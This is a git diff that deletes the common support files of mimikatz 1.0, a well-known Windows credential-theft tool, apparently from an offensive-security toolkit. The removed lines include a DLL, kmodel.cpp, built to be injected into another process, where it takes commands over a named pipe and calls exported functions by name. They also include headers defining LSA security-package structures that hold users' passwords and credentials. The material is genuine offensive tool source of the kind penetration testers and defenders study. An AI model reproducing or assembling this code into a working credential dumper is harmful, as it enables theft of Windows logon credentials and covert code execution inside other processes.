aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/commun
diff options
context:
space:
mode:
Diffstat (limited to 'Exfiltration/mimikatz-1.0/commun')
-rw-r--r--Exfiltration/mimikatz-1.0/commun/globdefs.h128
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_32.icobin4286 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_48.icobin9662 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.icobin15086 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.icobin15086 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.icobin15086 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.icobin1150 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_32.icobin4286 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_48.icobin9662 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.icobin15086 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.icobin4286 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.icobin9662 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.icobin15086 -> 0 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/kmodel.cpp139
-rw-r--r--Exfiltration/mimikatz-1.0/commun/kmodel.h21
-rw-r--r--Exfiltration/mimikatz-1.0/commun/secpkg.h239
16 files changed, 0 insertions, 527 deletions
diff --git a/Exfiltration/mimikatz-1.0/commun/globdefs.h b/Exfiltration/mimikatz-1.0/commun/globdefs.h
deleted file mode 100644
index d579a3b..0000000
--- a/Exfiltration/mimikatz-1.0/commun/globdefs.h
+++ /dev/null
@@ -1,128 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#pragma warning(disable:4530)
-#include <stdio.h>
-#include <windows.h>
-#include <ntsecapi.h>
-#include <string>
-#include <vector>
-using namespace std;
-
-#define SECURITY_WIN32
-#define PAGE_SIZE 0x1000
-#define MAX_DOMAIN_LEN 24
-#define MAX_USERNAME_LEN 24
-
-#define MIMIKATZ L"mimikatz"
-#ifdef _M_X64
- #define MIMIKATZ_FULL L"mimikatz 1.0 x64 (RC)"
-#else ifdef
- #define MIMIKATZ_FULL L"mimikatz 1.0 x86 (RC)"
-#endif
-
-#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
-#define NT_INFORMATION(Status) ((((ULONG)(Status)) >> 30) == 1)
-#define NT_WARNING(Status) ((((ULONG)(Status)) >> 30) == 2)
-#define NT_ERROR(Status) ((((ULONG)(Status)) >> 30) == 3)
-
-#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
-#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
-#define STATUS_MORE_ENTRIES ((NTSTATUS)0x00000105L)
-
-#define S_SWAP(a, b) {BYTE t = S[a]; S[a] = S[b]; S[b] = t;}
-
-typedef bool (* PKIWI_LOCAL_COMMAND) (vector<wstring> * arguments);
-
-typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND {
- PKIWI_LOCAL_COMMAND ptrCommand;
- wstring commandName;
- wstring commandHelp;
- _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name, wstring help) : ptrCommand(command), commandName(name), commandHelp(help) {}
- _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name) : ptrCommand(command), commandName(name), commandHelp() {}
-} KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND, *PKIWI_MIMIKATZ_LOCAL_MODULE_COMMAND;
-
-typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE {
- wstring module;
- wstring description;
- vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> commandes;
- _KIWI_MIMIKATZ_LOCAL_MODULE(wstring leModule, wstring laDescription, vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> lesCommandes) : module(leModule), description(laDescription), commandes(lesCommandes) {}
-} KIWI_MIMIKATZ_LOCAL_MODULE, *PKIWI_MIMIKATZ_LOCAL_MODULE;
-
-typedef struct _CLIENT_ID {
- PVOID UniqueProcess;
- PVOID UniqueThread;
-} CLIENT_ID, *PCLIENT_ID;
-
-typedef const ULONG CLONG;
-typedef const UNICODE_STRING *PCUNICODE_STRING;
-typedef STRING OEM_STRING;
-typedef PSTRING POEM_STRING;
-typedef CONST STRING* PCOEM_STRING;
-
-/* System* */
-typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_006) (LPCSTR string, BYTE hash[16]);
-typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_007) (PUNICODE_STRING string, BYTE hash[16]);
-typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_025) (BYTE[16], DWORD *, BYTE[16]);
-typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_027) (BYTE[16], DWORD *, BYTE[16]);
-/* CNG */
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_STORAGE_PROVIDER) (__out NCRYPT_PROV_HANDLE *phProvider, __in_opt LPCWSTR pszProviderName, __in DWORD dwFlags);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_ENUM_KEYS) (__in NCRYPT_PROV_HANDLE hProvider, __in_opt LPCWSTR pszScope, __deref_out NCryptKeyName **ppKeyName, __inout PVOID * ppEnumState, __in DWORD dwFlags);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_KEY) (__in NCRYPT_PROV_HANDLE hProvider, __out NCRYPT_KEY_HANDLE *phKey, __in LPCWSTR pszKeyName, __in DWORD dwLegacyKeySpec, __in DWORD dwFlags);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_EXPORT_KEY) (__in NCRYPT_KEY_HANDLE hKey, __in_opt NCRYPT_KEY_HANDLE hExportKey, __in LPCWSTR pszBlobType, __in_opt NCryptBufferDesc *pParameterList, __out_opt PBYTE pbOutput, __in DWORD cbOutput, __out DWORD *pcbResult, __in DWORD dwFlags);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_GET_PROPERTY) (__in NCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PBYTE pbOutput, __in DWORD cbOutput, __out DWORD * pcbResult, __in DWORD dwFlags);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_BUFFER) (__deref PVOID pvInput);
-typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_OBJECT) (__in NCRYPT_HANDLE hObject);
-typedef NTSTATUS (WINAPI * PBCRYPT_ENUM_REGISTERED_PROVIDERS)(__inout ULONG* pcbBuffer, __deref_opt_inout_bcount_part_opt(*pcbBuffer, *pcbBuffer) PCRYPT_PROVIDERS *ppBuffer);
-typedef VOID (WINAPI * PBCRYPT_FREE_BUFFER) (__in PVOID pvBuffer);
-
-typedef NTSTATUS (WINAPI * PBCRYPT_OPEN_ALGORITHM_PROVIDER) (__out BCRYPT_ALG_HANDLE *phAlgorithm, __in LPCWSTR pszAlgId, __in_opt LPCWSTR pszImplementation, __in ULONG dwFlags);
-typedef NTSTATUS (WINAPI * PBCRYPT_SET_PROPERTY) (__inout BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __in_bcount(cbInput) PUCHAR pbInput, __in ULONG cbInput, __in ULONG dwFlags);
-typedef NTSTATUS (WINAPI * PBCRYPT_GET_PROPERTY) (__in BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PUCHAR pbOutput, __in ULONG cbOutput, __out ULONG *pcbResult, __in ULONG dwFlags);
-typedef NTSTATUS (WINAPI * PBCRYPT_GENERATE_SYMMETRIC_KEY) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __out BCRYPT_KEY_HANDLE *phKey, __out_bcount_full_opt(cbKeyObject) PUCHAR pbKeyObject, __in ULONG cbKeyObject, __in_bcount(cbSecret) PUCHAR pbSecret, __in ULONG cbSecret, __in ULONG dwFlags);
-typedef NTSTATUS (WINAPI * PBCRYTP_DESTROY_KEY) (__inout BCRYPT_KEY_HANDLE hKey);
-typedef NTSTATUS (WINAPI * PBCRYTP_CLOSE_ALGORITHM_PROVIDER) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __in ULONG dwFlags);
-
-/* Rtl* */
-#define RtlEqualLuid(L1, L2) (((L1)->LowPart == (L2)->LowPart) && ((L1)->HighPart == (L2)->HighPart))
-typedef NTSTATUS (WINAPI * PRTL_CREATE_USER_THREAD) (__in HANDLE Process, __in_opt PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, __in char Flags, __in_opt ULONG ZeroBits, __in_opt SIZE_T MaximumStackSize, __in_opt SIZE_T CommittedStackSize, __in PTHREAD_START_ROUTINE StartAddress, __in_opt PVOID Parameter, __out_opt PHANDLE Thread, __out_opt PCLIENT_ID ClientId);
-typedef VOID (WINAPI * PRTL_INIT_STRING) (PSTRING DestinationString, PCSTR SourceString);
-typedef VOID (WINAPI * PRTL_INIT_UNICODESTRING) (PUNICODE_STRING DestinationString, PCWSTR SourceString);
-typedef NTSTATUS (WINAPI * PRTL_UPCASE_UNICODE_STRING_TO_OEM_STRING) (POEM_STRING DestinationString, PCUNICODE_STRING SourceString, BOOLEAN AllocateDestinationString);
-typedef VOID (WINAPI * PRTL_FREE_OEM_STRING) (POEM_STRING OemString);
-typedef PVOID (WINAPI * PRTL_LOOKUP_ELEMENT_GENERIC_TABLE_AV) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer);
-typedef enum _RTL_GENERIC_COMPARE_RESULTS (WINAPI * PRTL_AVL_COMPARE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID FirstStruct, __in PVOID SecondStruct);
-typedef PVOID (WINAPI * PRTL_AVL_ALLOCATE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in CLONG ByteSize);
-typedef VOID (WINAPI * PRTL_AVL_FREE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer);
-
-typedef struct _RTL_BALANCED_LINKS {
- struct _RTL_BALANCED_LINKS *Parent;
- struct _RTL_BALANCED_LINKS *LeftChild;
- struct _RTL_BALANCED_LINKS *RightChild;
- CHAR Balance;
- UCHAR Reserved[3];
-} RTL_BALANCED_LINKS;
-typedef RTL_BALANCED_LINKS *PRTL_BALANCED_LINKS;
-
-typedef enum _RTL_GENERIC_COMPARE_RESULTS {
- GenericLessThan,
- GenericGreaterThan,
- GenericEqual
-} RTL_GENERIC_COMPARE_RESULTS;
-
-typedef struct _RTL_AVL_TABLE {
- RTL_BALANCED_LINKS BalancedRoot;
- PVOID OrderedPointer;
- ULONG WhichOrderedElement;
- ULONG NumberGenericTableElements;
- ULONG DepthOfTree;
- PRTL_BALANCED_LINKS RestartKey;
- ULONG DeleteCount;
- PRTL_AVL_COMPARE_ROUTINE CompareRoutine;
- PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;
- PRTL_AVL_FREE_ROUTINE FreeRoutine;
- PVOID TableContext;
-} RTL_AVL_TABLE, *PRTL_AVL_TABLE;
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico
deleted file mode 100644
index 9ac92da..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico
deleted file mode 100644
index 79edffc..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico
deleted file mode 100644
index 2285d1c..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico
deleted file mode 100644
index 745963e..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico
deleted file mode 100644
index 7497143..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico
deleted file mode 100644
index 07df30f..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico
deleted file mode 100644
index 67b1100..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico
deleted file mode 100644
index 6d7f787..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico
deleted file mode 100644
index 805707a..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico
deleted file mode 100644
index a1c08e5..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico
deleted file mode 100644
index ea38a48..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico
deleted file mode 100644
index 27adde3..0000000
--- a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico
+++ /dev/null
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/kmodel.cpp b/Exfiltration/mimikatz-1.0/commun/kmodel.cpp
deleted file mode 100644
index a87ea8f..0000000
--- a/Exfiltration/mimikatz-1.0/commun/kmodel.cpp
+++ /dev/null
@@ -1,139 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "kmodel.h"
-
-HMODULE g_hModule = NULL;
-
-BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
-{
- if (ul_reason_for_call == DLL_PROCESS_ATTACH)
- {
- g_hModule = hModule;
-
- HANDLE hThread = CreateThread(NULL, 0, &ThreadProc, NULL, 0, NULL);
- if(hThread && hThread != INVALID_HANDLE_VALUE)
- {
- return CloseHandle(hThread);
- }
- }
- return TRUE;
-}
-
-DWORD WINAPI ThreadProc(LPVOID lpParameter)
-{
- mod_pipe * monCommunicator = new mod_pipe(L"kiwi\\mimikatz");
-
- bool succes = false;
- for(DWORD nbRetry = 1; nbRetry <= 5 && !succes; nbRetry++)
- {
- succes = monCommunicator->createClient();
- if(!succes)
- {
- Sleep(3000);
- }
- }
-
- if(succes)
- {
- ptrFunctionString maFonctionString = reinterpret_cast<ptrFunctionString>(GetProcAddress(g_hModule, "getDescription"));
-
- wstring monBuffer = L"Bienvenue dans un processus distant\n\t\t\tGentil Kiwi";
- if(maFonctionString)
- {
- wstring * maDescription = new wstring();
- if(maFonctionString(maDescription))
- {
- monBuffer.append(L"\n\n");
- monBuffer.append(*maDescription);
- }
- delete maDescription;
- }
-
-
-
- if(monCommunicator->writeToPipe(monBuffer))
- {
- for(;;)
- {
- if(monCommunicator->readFromPipe(monBuffer))
- {
- wstring fonction = monBuffer;
- vector<wstring> arguments;
-
- size_t monIndex = fonction.find(L' ');
-
- if(monIndex != wstring::npos)
- {
- arguments = mod_parseur::parse(fonction.substr(monIndex + 1));
- fonction = fonction.substr(0, monIndex);
- }
-
- string procDll(fonction.begin(), fonction.end());
-
- ptrFunction maFonction = reinterpret_cast<ptrFunction>(GetProcAddress(g_hModule, procDll.c_str()));
-
- if(maFonction)
- {
- if(maFonction(monCommunicator, &arguments))
- {
- monBuffer = L"@";
- }
- else // La fonction à retourné FALSE, il y a donc anomalie bloquante sur le canal
- {
- break;
- }
- }
- else
- {
- monBuffer = L"@Méthode \'";
- monBuffer.append(fonction);
- monBuffer.append(L"\' introuvable !\n");
- }
-
- if(!monCommunicator->writeToPipe(monBuffer))
- {
- break;
- }
- }
- else
- {
- break;
- }
- }
- }
- }
-
- delete monCommunicator;
-
- FreeLibraryAndExitThread(g_hModule, 0);
- return 0;
-}
-
-bool sendTo(mod_pipe * monPipe, wstring message)
-{
- wstring reponse = L"#";
- reponse.append(message);
-
- return monPipe->writeToPipe(reponse);
-}
-
-
-__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
- bool sendOk = sendTo(monPipe, L"pong");
-
- for(vector<wstring>::iterator monArgument = mesArguments->begin(); monArgument != mesArguments->end() && sendOk; monArgument++)
- {
- wstring maReponse = L" - argument:";
- maReponse.append(*monArgument);
- sendOk = sendTo(monPipe, maReponse);
- }
-
- if(sendOk)
- sendOk = sendTo(monPipe, L"\n");
-
- return sendOk;
-} \ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/commun/kmodel.h b/Exfiltration/mimikatz-1.0/commun/kmodel.h
deleted file mode 100644
index 65bd912..0000000
--- a/Exfiltration/mimikatz-1.0/commun/kmodel.h
+++ /dev/null
@@ -1,21 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "globdefs.h"
-#include "mod_pipe.h"
-#include "mod_parseur.h"
-
-#define __kextdll extern "C" __declspec(dllexport)
-
-typedef bool (__cdecl * ptrFunction) (mod_pipe * monPipe, vector<wstring> * mesArguments);
-typedef bool (__cdecl * ptrFunctionString) (wstring * maDescription);
-
-BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);
-DWORD WINAPI ThreadProc(LPVOID lpParameter);
-
-bool sendTo(mod_pipe * monPipe, wstring message);
-
-__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments);
diff --git a/Exfiltration/mimikatz-1.0/commun/secpkg.h b/Exfiltration/mimikatz-1.0/commun/secpkg.h
deleted file mode 100644
index 385307d..0000000
--- a/Exfiltration/mimikatz-1.0/commun/secpkg.h
+++ /dev/null
@@ -1,239 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "globdefs.h"
-#include <sspi.h>
-#include <wincred.h>
-
-typedef struct _KIWI_GENERIC_PRIMARY_CREDENTIAL
-{
- LSA_UNICODE_STRING UserName;
- LSA_UNICODE_STRING Domaine;
- LSA_UNICODE_STRING Password;
-} KIWI_GENERIC_PRIMARY_CREDENTIAL, * PKIWI_GENERIC_PRIMARY_CREDENTIAL;
-
-typedef NTSTATUS (WINAPIV * PLSA_INITIALIZE_PROTECTED_MEMORY) ();
-
-typedef PVOID *PLSA_CLIENT_REQUEST;
-typedef LPTHREAD_START_ROUTINE SEC_THREAD_START;
-typedef LPSECURITY_ATTRIBUTES SEC_ATTRS;
-
-typedef struct _SECPKG_CLIENT_INFO {
- LUID LogonId; // Effective Logon Id
- ULONG ProcessID; // Process Id of caller
- ULONG ThreadID; // Thread Id of caller
- BOOLEAN HasTcbPrivilege; // Client has TCB
- BOOLEAN Impersonating; // Client is impersonating
- BOOLEAN Restricted; // Client is restricted
- // NT 5.1
- UCHAR ClientFlags; // Extra flags about the client
- SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; // Impersonation level of client
- // NT 6
- HANDLE ClientToken;
-} SECPKG_CLIENT_INFO, * PSECPKG_CLIENT_INFO;
-
-typedef enum _LSA_TOKEN_INFORMATION_TYPE {
- LsaTokenInformationNull, // Implies LSA_TOKEN_INFORMATION_NULL data type
- LsaTokenInformationV1, // Implies LSA_TOKEN_INFORMATION_V1 data type
- LsaTokenInformationV2 // Implies LSA_TOKEN_INFORMATION_V2 data type
-} LSA_TOKEN_INFORMATION_TYPE, *PLSA_TOKEN_INFORMATION_TYPE;
-
-typedef enum _SECPKG_NAME_TYPE {
- SecNameSamCompatible,
- SecNameAlternateId,
- SecNameFlat,
- SecNameDN,
- SecNameSPN
-} SECPKG_NAME_TYPE;
-
-typedef struct _SECPKG_CALL_INFO {
- ULONG ProcessId;
- ULONG ThreadId;
- ULONG Attributes;
- ULONG CallCount;
- PVOID MechOid; // mechanism objection identifer
-} SECPKG_CALL_INFO, * PSECPKG_CALL_INFO;
-
-typedef enum _SECPKG_SESSIONINFO_TYPE {
- SecSessionPrimaryCred // SessionInformation is SECPKG_PRIMARY_CRED
-} SECPKG_SESSIONINFO_TYPE;
-
-typedef struct _SECPKG_PRIMARY_CRED {
- LUID LogonId;
- UNICODE_STRING DownlevelName; // Sam Account Name
- UNICODE_STRING DomainName; // Netbios domain name where account is located
- UNICODE_STRING Password;
- UNICODE_STRING OldPassword;
- PSID UserSid;
- ULONG Flags;
- UNICODE_STRING DnsDomainName; // DNS domain name where account is located (if known)
- UNICODE_STRING Upn; // UPN of account (if known)
- UNICODE_STRING LogonServer;
- UNICODE_STRING Spare1;
- UNICODE_STRING Spare2;
- UNICODE_STRING Spare3;
- UNICODE_STRING Spare4;
-} SECPKG_PRIMARY_CRED, *PSECPKG_PRIMARY_CRED;
-
-typedef struct _SECPKG_SUPPLEMENTAL_CRED {
- UNICODE_STRING PackageName;
- ULONG CredentialSize;
-#ifdef MIDL_PASS
- [size_is(CredentialSize)]
-#endif // MIDL_PASS
- PUCHAR Credentials;
-} SECPKG_SUPPLEMENTAL_CRED, *PSECPKG_SUPPLEMENTAL_CRED;
-
-typedef struct _SECPKG_SUPPLEMENTAL_CRED_ARRAY {
- ULONG CredentialCount;
-#ifdef MIDL_PASS
- [size_is(CredentialCount)] SECPKG_SUPPLEMENTAL_CRED Credentials[*];
-#else // MIDL_PASS
- SECPKG_SUPPLEMENTAL_CRED Credentials[1];
-#endif // MIDL_PASS
-} SECPKG_SUPPLEMENTAL_CRED_ARRAY, *PSECPKG_SUPPLEMENTAL_CRED_ARRAY;
-
-typedef NTSTATUS (WINAPI * PLSA_CALLBACK_FUNCTION) (ULONG_PTR Argument1, ULONG_PTR Argument2, PSecBuffer InputBuffer, PSecBuffer OutputBuffer);
-
-typedef NTSTATUS (WINAPI * PLSA_CREATE_LOGON_SESSION) (IN PLUID LogonId);
-typedef NTSTATUS (WINAPI * PLSA_DELETE_LOGON_SESSION) (IN PLUID LogonId);
-typedef NTSTATUS (WINAPI * PLSA_ADD_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue, IN PLSA_STRING Credentials);
-typedef NTSTATUS (WINAPI * PLSA_GET_CREDENTIALS) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN OUT PULONG QueryContext, IN BOOLEAN RetrieveAllCredentials, IN PLSA_STRING PrimaryKeyValue, OUT PULONG PrimaryKeyLength, IN PLSA_STRING Credentials);
-typedef NTSTATUS (WINAPI * PLSA_DELETE_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue);
-typedef PVOID (WINAPI * PLSA_ALLOCATE_LSA_HEAP) (IN ULONG Length);
-typedef VOID (WINAPI * PLSA_FREE_LSA_HEAP) (IN PVOID Base);
-typedef PVOID (WINAPI * PLSA_ALLOCATE_PRIVATE_HEAP) (IN SIZE_T Length);
-typedef VOID (WINAPI * PLSA_FREE_PRIVATE_HEAP) (IN PVOID Base);
-typedef NTSTATUS (WINAPI * PLSA_ALLOCATE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG LengthRequired, OUT PVOID *ClientBaseAddress);
-typedef NTSTATUS (WINAPI * PLSA_FREE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN PVOID ClientBaseAddress);
-typedef NTSTATUS (WINAPI * PLSA_COPY_TO_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID ClientBaseAddress, IN PVOID BufferToCopy);
-typedef NTSTATUS (WINAPI * PLSA_COPY_FROM_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID BufferToCopy, IN PVOID ClientBaseAddress);
-typedef NTSTATUS (WINAPI * PLSA_IMPERSONATE_CLIENT) (VOID);
-typedef NTSTATUS (WINAPI * PLSA_UNLOAD_PACKAGE) (VOID);
-typedef NTSTATUS (WINAPI * PLSA_DUPLICATE_HANDLE) (IN HANDLE SourceHandle, OUT PHANDLE DestionationHandle);
-typedef NTSTATUS (WINAPI * PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS) (IN PLUID LogonId, IN ULONG SupplementalCredSize, IN PVOID SupplementalCreds, IN BOOLEAN Synchronous);
-typedef HANDLE (WINAPI * PLSA_CREATE_THREAD) (IN SEC_ATTRS SecurityAttributes, IN ULONG StackSize, IN SEC_THREAD_START StartFunction, IN PVOID ThreadParameter, IN ULONG CreationFlags, OUT PULONG ThreadId);
-typedef NTSTATUS (WINAPI * PLSA_GET_CLIENT_INFO) (OUT PSECPKG_CLIENT_INFO ClientInfo);
-typedef HANDLE (WINAPI * PLSA_REGISTER_NOTIFICATION) (IN SEC_THREAD_START StartFunction, IN PVOID Parameter, IN ULONG NotificationType, IN ULONG NotificationClass, IN ULONG NotificationFlags, IN ULONG IntervalMinutes, IN OPTIONAL HANDLE WaitEvent);
-typedef NTSTATUS (WINAPI * PLSA_CANCEL_NOTIFICATION) (IN HANDLE NotifyHandle);
-typedef NTSTATUS (WINAPI * PLSA_MAP_BUFFER) (IN PSecBuffer InputBuffer, OUT PSecBuffer OutputBuffer);
-typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthorityName, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, OUT PHANDLE Token, OUT PNTSTATUS SubStatus);
-typedef NTSTATUS (WINAPI * PLSA_CREATE_TOKEN_EX) (IN PLUID LogonId, IN PTOKEN_SOURCE TokenSource, IN SECURITY_LOGON_TYPE LogonType, IN SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, IN LSA_TOKEN_INFORMATION_TYPE TokenInformationType, IN PVOID TokenInformation, IN PTOKEN_GROUPS TokenGroups, IN PUNICODE_STRING Workstation, IN PUNICODE_STRING ProfilePath, IN PVOID SessionInformation, IN SECPKG_SESSIONINFO_TYPE SessionInformationType, OUT PHANDLE Token, OUT PNTSTATUS SubStatus);
-typedef VOID (WINAPI * PLSA_AUDIT_LOGON) (IN NTSTATUS Status, IN NTSTATUS SubStatus, IN PUNICODE_STRING AccountName, IN PUNICODE_STRING AuthenticatingAuthority, IN PUNICODE_STRING WorkstationName, IN OPTIONAL PSID UserSid, IN SECURITY_LOGON_TYPE LogonType, IN PTOKEN_SOURCE TokenSource, IN PLUID LogonId);
-typedef NTSTATUS (WINAPI * PLSA_CALL_PACKAGE) (IN PUNICODE_STRING AuthenticationPackage, IN PVOID ProtocolSubmitBuffer, IN ULONG SubmitBufferLength, OUT PVOID *ProtocolReturnBuffer, OUT PULONG ReturnBufferLength, OUT PNTSTATUS ProtocolStatus);
